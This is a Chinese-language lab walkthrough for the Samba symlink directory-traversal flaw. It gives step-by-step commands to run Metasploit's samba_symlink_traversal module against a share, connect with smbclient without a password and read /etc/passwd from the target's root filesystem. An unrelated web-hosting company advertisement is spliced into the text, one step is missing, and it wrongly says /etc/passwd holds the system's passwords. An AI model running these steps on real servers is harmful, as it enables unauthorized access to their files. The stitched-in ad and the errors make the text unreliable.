Samba是一套實現SMB（server messages block）協議，跨平臺進行文件共享和打印共享服務的程序，samba的sambd默認配置在可寫文件共享時，存在目錄遍歷漏洞，遠程用戶可以通過smbclient端使用一個對稱命，創建一個包含..的目錄遍歷符的軟連接 ，可以進行目錄遍歷以及訪問任意文件。

目前創新互聯公司已為上千多家的企業提供了網站建設、域名、網絡空間、網站托管維護、企業網站設計、荷塘網站維護等服務，公司將堅持客戶導向、應用為本的策略，正道將秉承"和諧、參與、激情"的文化，與客戶和合作伙伴齊心協力一起成長，共同發展。

一、利用nmap工具掃描目標主機

1.1使用nmap命令對目標主機進行掃描。單擊桌面空白處，右鍵菜單選擇“在終端中打開”。

1.3在終端中輸入命令“msfconsole”，啟動MSF終端。

1.4在終端中輸入命令“search samba”，搜索samba的相關工具和***載荷。

1.5在終端中輸入命令“use auxiliary/admin/smb/samba_symlink_traversal”，啟用漏洞利用模塊, 提示符就會提示進入到該路徑下。

1.6在終端中輸入命令“info”，查看需要設置的相關項，“yes”表示必須填寫的參數。

1.7在終端中輸入命令“set RHOST 192.168.1.3”，設置目標主機的IP地址。

1.8在終端中輸入“set SMBSHARE tmp”, 設置SAM可寫文件。

1.9在終端中輸入“exploit”, 開始***。

1.10新打開一個終端，輸入“smbclient //192.168.1.3/tmp”,直接回車，不用輸入密碼。

1.11在終端中輸入“cd rootfs”, 進入rootfs目錄,在終端下輸入命令“ls”,列出目錄。

1.12在終端中輸入“more /etc/passwd”, 查看目標主機系統中的密碼。